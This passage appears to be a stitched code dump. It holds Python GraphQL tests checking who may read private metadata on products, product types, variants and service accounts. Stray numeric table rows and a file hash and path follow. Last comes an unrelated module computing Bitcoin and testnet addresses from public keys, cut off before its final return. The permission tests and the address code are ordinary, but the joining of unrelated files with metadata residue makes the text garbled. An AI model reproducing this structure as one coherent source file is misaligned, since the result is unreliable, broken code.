    query productsMeta($id: ID!){
        product(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_product_as_anonymous_user(api_client, product):
    """Anonymous users may not read product private metadata."""
    # given
    product_id = graphene.Node.to_global_id("Product", product.pk)

    # when
    response = api_client.post_graphql(QUERY_PRODUCT_PRIVATE_META, {"id": product_id})

    # then
    assert_no_permission(response)


def test_query_private_meta_for_product_as_customer(user_api_client, product):
    """Customers may not read product private metadata."""
    # given
    product_id = graphene.Node.to_global_id("Product", product.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_PRODUCT_PRIVATE_META, {"id": product_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_product_as_staff(
    staff_api_client, product, permission_manage_products
):
    """Staff with product permissions can read product private metadata."""
    # given
    product.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    product.save(update_fields=["private_metadata"])
    product_id = graphene.Node.to_global_id("Product", product.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_PRODUCT_PRIVATE_META,
        {"id": product_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["product"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_product_as_service_account(
    service_account_api_client, product, permission_manage_products
):
    """Service accounts with product permissions can read product private metadata."""
    # given
    product.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    product.save(update_fields=["private_metadata"])
    product_id = graphene.Node.to_global_id("Product", product.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_PRODUCT_PRIVATE_META,
        {"id": product_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["product"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_PRODUCT_TYPE_PRIVATE_META = """
    query productTypeMeta($id: ID!){
        productType(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_product_type_as_anonymous_user(
    api_client, product_type
):
    """Anonymous users may not read product type private metadata."""
    # given
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    # when
    response = api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PRIVATE_META, {"id": type_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_product_type_as_customer(user_api_client, product_type):
    """Customers may not read product type private metadata."""
    # given
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PRIVATE_META, {"id": type_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_product_type_as_staff(
    staff_api_client, product_type, permission_manage_products
):
    """Staff with product permissions can read product type private metadata."""
    # given
    product_type.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    product_type.save(update_fields=["private_metadata"])
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PRIVATE_META,
        {"id": type_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["productType"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_product_type_as_service_account(
    service_account_api_client, product_type, permission_manage_products
):
    """Service accounts with product permissions can read product type private metadata."""
    # given
    product_type.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    product_type.save(update_fields=["private_metadata"])
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PRIVATE_META,
        {"id": type_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["productType"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_PRODUCT_VARIANT_PRIVATE_META = """
query productVariantMeta($id: ID!){
productVariant(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_product_variant_as_anonymous_user(api_client, variant):
    """Anonymous API callers get no access to variant private metadata."""
    # given: a variant that actually has a private metadata entry stored
    variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    variant.save(update_fields=["private_metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)
    # when: the anonymous client runs the private-metadata query
    response = api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PRIVATE_META, {"id": variant_id}
    )
    # then: the API denies access
    assert_no_permission(response)
def test_query_private_meta_for_product_variant_as_customer(user_api_client, variant):
    """A regular customer must not be able to read variant private metadata."""
    # given: a variant that actually has a private metadata entry stored
    variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    variant.save(update_fields=["private_metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)
    # when: the customer runs the private-metadata query
    response = user_api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PRIVATE_META, {"id": variant_id}
    )
    # then: the API denies access
    assert_no_permission(response)
def test_query_private_meta_for_product_variant_as_staff(
    staff_api_client, variant, permission_manage_products
):
    """Staff holding manage-products permission can read variant private metadata."""
    # given: a variant carrying one known private metadata entry
    variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    variant.save(update_fields=["private_metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)
    # when: the staff user queries it with the required permission attached
    response = staff_api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PRIVATE_META,
        {"id": variant_id},
        [permission_manage_products],
        check_no_permissions=False,
    )
    data = get_graphql_content(response)
    # then: the stored key/value pair comes back as the first entry
    first_entry = data["data"]["productVariant"]["privateMetadata"][0]
    assert first_entry["key"] == PRIVATE_KEY
    assert first_entry["value"] == PRIVATE_VALUE
def test_query_private_meta_for_product_variant_as_service_account(
    service_account_api_client, variant, permission_manage_products
):
    """A service account with manage-products permission can read variant private metadata."""
    # given: a variant carrying one known private metadata entry
    variant.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    variant.save(update_fields=["private_metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)
    # when: the service account queries it with the required permission attached
    response = service_account_api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PRIVATE_META,
        {"id": variant_id},
        [permission_manage_products],
        check_no_permissions=False,
    )
    data = get_graphql_content(response)
    # then: the stored key/value pair comes back as the first entry
    first_entry = data["data"]["productVariant"]["privateMetadata"][0]
    assert first_entry["key"] == PRIVATE_KEY
    assert first_entry["value"] == PRIVATE_VALUE
# GraphQL query returning the private metadata entries (key/value pairs)
# of a single service account looked up by its relay global ID.
QUERY_SERVICE_ACCOUNT_PRIVATE_META = """
query serviceAccountMeta($id: ID!){
serviceAccount(id: $id){
privateMetadata{
key
value
}
}
}
"""
def test_query_private_meta_for_service_account_as_anonymous_user(
    api_client, service_account
):
    """Anonymous API callers get no access to service account private metadata."""
    # given: the relay global ID of the service account under test
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)
    # when: the anonymous client runs the private-metadata query
    response = api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PRIVATE_META, {"id": account_id}
    )
    # then: the API denies access
    assert_no_permission(response)
def test_query_private_meta_for_service_account_as_customer(
    user_api_client, service_account
):
    """A regular customer must not be able to read service account private metadata."""
    # given: the relay global ID of the service account under test
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)
    # when: the customer runs the private-metadata query
    response = user_api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PRIVATE_META, {"id": account_id}
    )
    # then: the API denies access
    assert_no_permission(response)
def test_query_private_meta_for_service_account_as_staff(
    staff_api_client, service_account, permission_manage_service_accounts
):
    """Staff holding manage-service-accounts permission can read private metadata."""
    # given: a service account carrying one known private metadata entry
    service_account.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    service_account.save(update_fields=["private_metadata"])
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)
    # when: the staff user queries it with the required permission attached
    response = staff_api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PRIVATE_META,
        {"id": account_id},
        [permission_manage_service_accounts],
        check_no_permissions=False,
    )
    data = get_graphql_content(response)
    # then: the stored key/value pair comes back as the first entry
    first_entry = data["data"]["serviceAccount"]["privateMetadata"][0]
    assert first_entry["key"] == PRIVATE_KEY
    assert first_entry["value"] == PRIVATE_VALUE
def test_query_private_meta_for_service_account_as_service_account(
    service_account_api_client, service_account, permission_manage_service_accounts
):
    """A service account with the right permission can read its own private metadata."""
    # given: a service account carrying one known private metadata entry
    service_account.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    service_account.save(update_fields=["private_metadata"])
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)
    # when: the service account queries it with the required permission attached
    response = service_account_api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PRIVATE_META,
        {"id": account_id},
        [permission_manage_service_accounts],
        check_no_permissions=False,
    )
    data = get_graphql_content(response)
    # then: the stored key/value pair comes back as the first entry
    first_entry = data["data"]["serviceAccount"]["privateMetadata"][0]
    assert first_entry["key"] == PRIVATE_KEY
    assert first_entry["value"] == PRIVATE_VALUE
| 30.092237
| 88
| 0.708863
| 9,132
| 78,300
| 5.649693
| 0.011608
| 0.043785
| 0.027678
| 0.04613
| 0.992073
| 0.98806
| 0.986859
| 0.985928
| 0.967864
| 0.959142
| 0
| 0.001622
| 0.18908
| 78,300
| 2,601
| 89
| 30.103806
| 0.81093
| 0.025428
| 0
| 0.774194
| 0
| 0
| 0.13019
| 0.002423
| 0
| 0
| 0
| 0
| 0.117889
| 1
| 0.069795
| false
| 0
| 0.001173
| 0
| 0.070968
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
812ded41e42dabb9c00b8c85add088817818b299
| 141
|
py
|
Python
|
src/prover/__init__.py
|
darrenlawton/automated_reasoning
|
9140d011be2ae364449cc86445803d9e05a6faf3
|
[
"MIT"
] | null | null | null |
src/prover/__init__.py
|
darrenlawton/automated_reasoning
|
9140d011be2ae364449cc86445803d9e05a6faf3
|
[
"MIT"
] | null | null | null |
src/prover/__init__.py
|
darrenlawton/automated_reasoning
|
9140d011be2ae364449cc86445803d9e05a6faf3
|
[
"MIT"
] | null | null | null |
# import os
# import sys
#
# sys.path.insert(0, os.path.join(
# os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'prover'))
| 23.5
| 78
| 0.673759
| 22
| 141
| 4.136364
| 0.5
| 0.263736
| 0.285714
| 0.32967
| 0.351648
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.120567
| 141
| 5
| 79
| 28.2
| 0.725806
| 0.921986
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4a0e6955ffe99f9535455bd03e3513bd0510002
| 8,699
|
py
|
Python
|
example_cycles/N+3ref/N3_LPC_map.py
|
swryan/pyCycleOld
|
fbab35b74d0e5487abe686ae0823ff52e75afb3b
|
[
"Apache-2.0"
] | null | null | null |
example_cycles/N+3ref/N3_LPC_map.py
|
swryan/pyCycleOld
|
fbab35b74d0e5487abe686ae0823ff52e75afb3b
|
[
"Apache-2.0"
] | null | null | null |
example_cycles/N+3ref/N3_LPC_map.py
|
swryan/pyCycleOld
|
fbab35b74d0e5487abe686ae0823ff52e75afb3b
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from pycycle.maps.map_data import MapData
# NOTE(review): this string sits after the imports, so it is a bare
# no-op expression rather than the module docstring; hoisting it above
# the imports would make it the real docstring.
"""Python version of CFM56 LPC map from NPSS"""
LPCmap = MapData()
# Map design point values
LPCmap.defaults = {}
LPCmap.defaults['alphaMap'] = 0.0
LPCmap.defaults['NcMap'] = 1.100
LPCmap.defaults['PR'] = 1.800
LPCmap.defaults['RlineMap'] = 2.200
# presumably the R-line value treated as the stall limit of the map —
# TODO confirm against the MapData consumer.
LPCmap.RlineStall = 1.0
# Independent (breakpoint) axes for the 3-D map tables defined below.
LPCmap.alphaMap = np.array([0.000, 1.000])
LPCmap.NcMap = np.array([0.300, 0.400, 0.500, 0.600, 0.700, 0.800, 0.900, 1.000, 1.100, 1.200, 1.250])
LPCmap.RlineMap = np.array([1.000, 1.200, 1.400, 1.600, 1.800, 2.000, 2.200, 2.400, 2.600, 2.800, 3.000, 3.200])
LPCmap.WcMap = np.array([[[ 38.0744, 42.9399, 47.7510, 52.5016, 57.1863, 61.7994, 66.3359, 70.7905, 75.1584, 76.5663, 76.5663, 76.5663],
[ 54.0383, 60.0388, 65.9233, 71.6816, 77.3038, 82.7808, 88.1038, 93.2648, 98.2565, 101.0545, 101.0545, 101.0545],
[ 70.3200, 77.5153, 84.4949, 91.2421, 97.7419, 103.9805, 109.9459, 115.6273, 121.0156, 124.6409, 124.6409, 124.6409],
[ 87.4860, 95.6896, 103.5393, 111.0128, 118.0907, 124.7566, 130.9971, 136.8019, 142.1633, 146.2312, 146.2312, 146.2312],
[105.8588, 114.8071, 123.2285, 131.0978, 138.3948, 145.1045, 151.2169, 156.7268, 161.6340, 165.7319, 165.7319, 165.7319],
[125.1164, 134.6062, 143.3572, 151.3454, 158.5548, 164.9773, 170.6127, 175.4677, 179.5554, 182.8951, 183.0717, 183.0717],
[144.4910, 154.5703, 163.6243, 171.6346, 178.5959, 184.5149, 189.4099, 193.3090, 196.2491, 198.2745, 198.4155, 198.4155],
[165.9141, 176.2228, 185.1849, 192.7986, 199.0806, 204.0644, 207.7979, 210.3410, 211.7638, 212.1506, 212.1506, 212.1506],
[188.5677, 198.3532, 206.6834, 213.5745, 219.0613, 223.1942, 226.0370, 227.6647, 228.1611, 228.1611, 228.1611, 228.1611],
[214.1402, 222.1943, 228.9021, 234.2963, 238.4220, 241.3359, 243.1030, 243.7959, 243.8124, 243.8124, 243.8124, 243.8124],
[227.8569, 234.5820, 240.1193, 244.5040, 247.7802, 250.0000, 251.2213, 251.5216, 251.5216, 251.5216, 251.5216, 251.5216]],
[[ 38.0744, 42.9399, 47.7510, 52.5016, 57.1863, 61.7994, 66.3359, 70.7905, 75.1584, 76.5663, 76.5663, 76.5663],
[ 54.0383, 60.0388, 65.9233, 71.6816, 77.3038, 82.7808, 88.1038, 93.2648, 98.2565, 101.0545, 101.0545, 101.0545],
[ 70.3200, 77.5153, 84.4949, 91.2421, 97.7419, 103.9805, 109.9459, 115.6273, 121.0156, 124.6409, 124.6409, 124.6409],
[ 87.4860, 95.6896, 103.5393, 111.0128, 118.0907, 124.7566, 130.9971, 136.8019, 142.1633, 146.2312, 146.2312, 146.2312],
[105.8588, 114.8071, 123.2285, 131.0978, 138.3948, 145.1045, 151.2169, 156.7268, 161.6340, 165.7319, 165.7319, 165.7319],
[125.1164, 134.6062, 143.3572, 151.3454, 158.5548, 164.9773, 170.6127, 175.4677, 179.5554, 182.8951, 183.0717, 183.0717],
[144.4910, 154.5703, 163.6243, 171.6346, 178.5959, 184.5149, 189.4099, 193.3090, 196.2491, 198.2745, 198.4155, 198.4155],
[165.9141, 176.2228, 185.1849, 192.7986, 199.0806, 204.0644, 207.7979, 210.3410, 211.7638, 212.1506, 212.1506, 212.1506],
[188.5677, 198.3532, 206.6834, 213.5745, 219.0613, 223.1942, 226.0370, 227.6647, 228.1611, 228.1611, 228.1611, 228.1611],
[214.1402, 222.1943, 228.9021, 234.2963, 238.4220, 241.3359, 243.1030, 243.7959, 243.8124, 243.8124, 243.8124, 243.8124],
[227.8569, 234.5820, 240.1193, 244.5040, 247.7802, 250.0000, 251.2213, 251.5216, 251.5216, 251.5216, 251.5216, 251.5216]]])
LPCmap.effMap = np.array([[[.7256, .7656, .7978, .8195, .8274, .8164, .7494, .5651, .1931, .0000, .0000, .0000],
[.7474, .7848, .8147, .8351, .8430, .8339, .7757, .6161, .3003, .0000, .0000, .0000],
[.7610, .7984, .8286, .8496, .8586, .8516, .7977, .6479, .3526, .0000, .0000, .0000],
[.7744, .8117, .8421, .8637, .8738, .8685, .8183, .6765, .3970, .0000, .0000, .0000],
[.7872, .8240, .8542, .8759, .8866, .8827, .8360, .7028, .4407, .0000, .0000, .0000],
[.7965, .8329, .8627, .8843, .8953, .8924, .8485, .7222, .4748, .0391, .0000, .0000],
[.7997, .8368, .8673, .8896, .9013, .8991, .8561, .7310, .4858, .0551, .0000, .0000],
[.8034, .8405, .8712, .8937, .9058, .9042, .8628, .7420, .5068, .0979, .0000, .0000],
[.8214, .8533, .8793, .8981, .9079, .9062, .8724, .7766, .5961, .2955, .0000, .0000],
[.8425, .8663, .8853, .8985, .9047, .9025, .8778, .8117, .6929, .5052, .2255, .0000],
[.8540, .8731, .8880, .8981, .9024, .9000, .8800, .8286, .7386, .6003, .4004, .1206]],
[[.7256, .7656, .7978, .8195, .8274, .8164, .7494, .5651, .1931, .0000, .0000, .0000],
[.7474, .7848, .8147, .8351, .8430, .8339, .7757, .6161, .3003, .0000, .0000, .0000],
[.7610, .7984, .8286, .8496, .8586, .8516, .7977, .6479, .3526, .0000, .0000, .0000],
[.7744, .8117, .8421, .8637, .8738, .8685, .8183, .6765, .3970, .0000, .0000, .0000],
[.7872, .8240, .8542, .8759, .8866, .8827, .8360, .7028, .4407, .0000, .0000, .0000],
[.7965, .8329, .8627, .8843, .8953, .8924, .8485, .7222, .4748, .0391, .0000, .0000],
[.7997, .8368, .8673, .8896, .9013, .8991, .8561, .7310, .4858, .0551, .0000, .0000],
[.8034, .8405, .8712, .8937, .9058, .9042, .8628, .7420, .5068, .0979, .0000, .0000],
[.8214, .8533, .8793, .8981, .9079, .9062, .8724, .7766, .5961, .2955, .0000, .0000],
[.8425, .8663, .8853, .8985, .9047, .9025, .8778, .8117, .6929, .5052, .2255, .0000],
[.8540, .8731, .8880, .8981, .9024, .9000, .8800, .8286, .7386, .6003, .4004, .1206]]])
LPCmap.PRmap = np.array([[[1.0423, 1.0412, 1.0393, 1.0367, 1.0333, 1.0292, 1.0234, 1.0151, 1.0043, 1.0000, 1.0000, 1.0000],
[1.0760, 1.0738, 1.0704, 1.0658, 1.0600, 1.0530, 1.0434, 1.0297, 1.0122, 1.0000, 1.0000, 1.0000],
[1.1215, 1.1180, 1.1127, 1.1055, 1.0965, 1.0856, 1.0707, 1.0497, 1.0228, 1.0000, 1.0000, 1.0000],
[1.1789, 1.1738, 1.1660, 1.1555, 1.1423, 1.1266, 1.1052, 1.0753, 1.0374, 1.0000, 1.0000, 1.0000],
[1.2494, 1.2422, 1.2312, 1.2167, 1.1986, 1.1771, 1.1481, 1.1078, 1.0572, 1.0000, 1.0000, 1.0000],
[1.3353, 1.3253, 1.3105, 1.2910, 1.2669, 1.2384, 1.2002, 1.1476, 1.0822, 1.0056, 1.0000, 1.0000],
[1.4411, 1.4282, 1.4088, 1.3830, 1.3512, 1.3136, 1.2632, 1.1942, 1.1088, 1.0101, 1.0000, 1.0000],
[1.5724, 1.5561, 1.5313, 1.4982, 1.4572, 1.4088, 1.3440, 1.2556, 1.1472, 1.0233, 1.0000, 1.0000],
[1.7323, 1.7101, 1.6785, 1.6379, 1.5888, 1.5318, 1.4572, 1.3572, 1.2358, 1.0982, 1.0000, 1.0000],
[1.9360, 1.9056, 1.8662, 1.8184, 1.7625, 1.6991, 1.6190, 1.5142, 1.3887, 1.2471, 1.0944, 1.0000],
[2.0507, 2.0158, 1.9729, 1.9223, 1.8645, 1.8000, 1.7201, 1.6176, 1.4958, 1.3584, 1.2098, 1.0546]],
[[1.0423, 1.0412, 1.0393, 1.0367, 1.0333, 1.0292, 1.0234, 1.0151, 1.0043, 1.0000, 1.0000, 1.0000],
[1.0760, 1.0738, 1.0704, 1.0658, 1.0600, 1.0530, 1.0434, 1.0297, 1.0122, 1.0000, 1.0000, 1.0000],
[1.1215, 1.1180, 1.1127, 1.1055, 1.0965, 1.0856, 1.0707, 1.0497, 1.0228, 1.0000, 1.0000, 1.0000],
[1.1789, 1.1738, 1.1660, 1.1555, 1.1423, 1.1266, 1.1052, 1.0753, 1.0374, 1.0000, 1.0000, 1.0000],
[1.2494, 1.2422, 1.2312, 1.2167, 1.1986, 1.1771, 1.1481, 1.1078, 1.0572, 1.0000, 1.0000, 1.0000],
[1.3353, 1.3253, 1.3105, 1.2910, 1.2669, 1.2384, 1.2002, 1.1476, 1.0822, 1.0056, 1.0000, 1.0000],
[1.4411, 1.4282, 1.4088, 1.3830, 1.3512, 1.3136, 1.2632, 1.1942, 1.1088, 1.0101, 1.0000, 1.0000],
[1.5724, 1.5561, 1.5313, 1.4982, 1.4572, 1.4088, 1.3440, 1.2556, 1.1472, 1.0233, 1.0000, 1.0000],
[1.7323, 1.7101, 1.6785, 1.6379, 1.5888, 1.5318, 1.4572, 1.3572, 1.2358, 1.0982, 1.0000, 1.0000],
[1.9360, 1.9056, 1.8662, 1.8184, 1.7625, 1.6991, 1.6190, 1.5142, 1.3887, 1.2471, 1.0944, 1.0000],
[2.0507, 2.0158, 1.9729, 1.9223, 1.8645, 1.8000, 1.7201, 1.6176, 1.4958, 1.3584, 1.2098, 1.0546]]])
#LPCmap.Nc_data, LPCmap.alpha_data, LPCmap.Rline_data = np.meshgrid(LPCmap.Nc_vals, LPCmap.alpha_vals, LPCmap.Rline_vals, sparse=False)
# Number of breakpoints on the NcMap axis.
LPCmap.Npts = LPCmap.NcMap.size
# Engineering units for the quantities that carry units.
LPCmap.units = {}
LPCmap.units['NcMap'] = 'rpm'
LPCmap.units['WcMap'] = 'lbm/s'
# format for new regular grid interpolator:
# Inputs (param_data) and outputs (output_data) are lists of dicts; the
# 'default' entries mirror the design-point values set in LPCmap.defaults
# at the top of the file (alphaMap=0, NcMap=1.1, RlineMap=2.2, PR=1.8).
LPCmap.param_data = []
LPCmap.output_data = []
LPCmap.param_data.append({'name': 'alphaMap', 'values': LPCmap.alphaMap,
'default': 0, 'units': None})
LPCmap.param_data.append({'name': 'NcMap', 'values': LPCmap.NcMap,
'default': 1.1, 'units': 'rpm'})
LPCmap.param_data.append({'name': 'RlineMap', 'values': LPCmap.RlineMap,
'default': 2.2, 'units': None})
LPCmap.output_data.append({'name': 'WcMap', 'values': LPCmap.WcMap,
'default': np.mean(LPCmap.WcMap), 'units': 'lbm/s'})
LPCmap.output_data.append({'name': 'effMap', 'values': LPCmap.effMap,
'default': np.mean(LPCmap.effMap), 'units': None})
LPCmap.output_data.append({'name': 'PRmap', 'values': LPCmap.PRmap,
'default': 1.8, 'units': None})
| 75.643478
| 146
| 0.611794
| 1,583
| 8,699
| 3.352495
| 0.303222
| 0.045223
| 0.052007
| 0.052761
| 0.817599
| 0.798568
| 0.798568
| 0.785378
| 0.785378
| 0.785378
| 0
| 0.580527
| 0.149902
| 8,699
| 114
| 147
| 76.307018
| 0.13712
| 0.022876
| 0
| 0.5625
| 0
| 0
| 0.025802
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020833
| 0
| 0.020833
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d4bbe1ea4deb5b327c259b2513376cefa41e0b19
| 53
|
py
|
Python
|
test.py
|
DongHenry/Py71
|
6e06cc4cda62daecba34ffbea4a8f03590a9098f
|
[
"MIT"
] | null | null | null |
test.py
|
DongHenry/Py71
|
6e06cc4cda62daecba34ffbea4a8f03590a9098f
|
[
"MIT"
] | null | null | null |
test.py
|
DongHenry/Py71
|
6e06cc4cda62daecba34ffbea4a8f03590a9098f
|
[
"MIT"
] | null | null | null |
import sys

# Dump the running interpreter's version: first the structured
# version_info tuple, then the full human-readable version banner.
for version_detail in (sys.version_info, sys.version):
    print(version_detail)
| 17.666667
| 23
| 0.830189
| 9
| 53
| 4.777778
| 0.555556
| 0.372093
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.056604
| 53
| 3
| 24
| 17.666667
| 0.86
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
d4f1d10585f7cc4b0e3f9a955cfc0ffa428a823b
| 2,266
|
py
|
Python
|
src/helper_bitcoin.py
|
BeholdersEye/PyBitmessage
|
362a975fbf1ec831d3107c7442527225bc140162
|
[
"MIT",
"BSD-2-Clause-FreeBSD"
] | 1,583
|
2015-01-01T13:03:20.000Z
|
2022-03-31T23:10:00.000Z
|
src/helper_bitcoin.py
|
BeholdersEye/PyBitmessage
|
362a975fbf1ec831d3107c7442527225bc140162
|
[
"MIT",
"BSD-2-Clause-FreeBSD"
] | 841
|
2015-01-01T14:51:48.000Z
|
2022-03-25T06:45:14.000Z
|
src/helper_bitcoin.py
|
BeholdersEye/PyBitmessage
|
362a975fbf1ec831d3107c7442527225bc140162
|
[
"MIT",
"BSD-2-Clause-FreeBSD"
] | 482
|
2015-01-07T00:53:25.000Z
|
2022-03-24T15:58:12.000Z
|
"""
Calculates bitcoin and testnet address from pubkey
"""
import hashlib
from debug import logger
from pyelliptic import arithmetic
def calculateBitcoinAddressFromPubkey(pubkey):
    """Calculate bitcoin address from given pubkey (65 bytes long hex string).

    Returns the Base58Check-encoded mainnet address as a string, or the
    literal string "error" when the pubkey is not exactly 65 bytes long.
    """
    if len(pubkey) != 65:
        logger.error('Could not calculate Bitcoin address from pubkey because'
                     ' function was passed a pubkey that was'
                     ' %i bytes long rather than 65.', len(pubkey))
        return "error"
    # HASH160: SHA-256 of the pubkey, then RIPEMD-160 of that digest.
    ripe = hashlib.new('ripemd160')
    sha = hashlib.new('sha256')
    sha.update(pubkey)
    ripe.update(sha.digest())
    # b'\x00' is the mainnet version prefix; a bytes literal (rather than
    # the original '\x00' str literal) keeps the concatenation with the
    # bytes digest working on Python 3 as well as Python 2.
    ripeWithProdnetPrefix = b'\x00' + ripe.digest()
    # Checksum is the first 4 bytes of a double SHA-256 (Base58Check).
    checksum = hashlib.sha256(hashlib.sha256(
        ripeWithProdnetPrefix).digest()).digest()[:4]
    binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
    # Each leading zero byte is represented by a literal '1' in Base58Check.
    # Slice (not index) so the comparison works on Python 2 str and
    # Python 3 bytes alike: indexing bytes yields an int on Python 3,
    # which would never compare equal and silently skip the loop.
    numberOfZeroBytesOnBinaryBitcoinAddress = 0
    while binaryBitcoinAddress[0:1] == b'\x00':
        numberOfZeroBytesOnBinaryBitcoinAddress += 1
        binaryBitcoinAddress = binaryBitcoinAddress[1:]
    base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
    return "1" * numberOfZeroBytesOnBinaryBitcoinAddress + base58encoded
def calculateTestnetAddressFromPubkey(pubkey):
    """This function expects that pubkey begin with the testnet prefix.

    Returns the Base58Check-encoded testnet address as a string, or the
    literal string "error" when the pubkey is not exactly 65 bytes long.
    """
    if len(pubkey) != 65:
        # Message corrected to say "testnet": this is the testnet variant,
        # not the mainnet one.
        logger.error('Could not calculate testnet address from pubkey because'
                     ' function was passed a pubkey that was'
                     ' %i bytes long rather than 65.', len(pubkey))
        return "error"
    # HASH160: SHA-256 of the pubkey, then RIPEMD-160 of that digest.
    ripe = hashlib.new('ripemd160')
    sha = hashlib.new('sha256')
    sha.update(pubkey)
    ripe.update(sha.digest())
    # b'\x6F' is the testnet version prefix; a bytes literal (rather than
    # the original '\x6F' str literal) keeps the concatenation with the
    # bytes digest working on Python 3 as well as Python 2.
    ripeWithProdnetPrefix = b'\x6F' + ripe.digest()
    # Checksum is the first 4 bytes of a double SHA-256 (Base58Check).
    checksum = hashlib.sha256(hashlib.sha256(
        ripeWithProdnetPrefix).digest()).digest()[:4]
    binaryBitcoinAddress = ripeWithProdnetPrefix + checksum
    # Each leading zero byte is represented by a literal '1' in Base58Check.
    # Slice (not index) so the comparison works on Python 2 str and
    # Python 3 bytes alike: indexing bytes yields an int on Python 3,
    # which would never compare equal and silently skip the loop.
    numberOfZeroBytesOnBinaryBitcoinAddress = 0
    while binaryBitcoinAddress[0:1] == b'\x00':
        numberOfZeroBytesOnBinaryBitcoinAddress += 1
        binaryBitcoinAddress = binaryBitcoinAddress[1:]
    base58encoded = arithmetic.changebase(binaryBitcoinAddress, 256, 58)
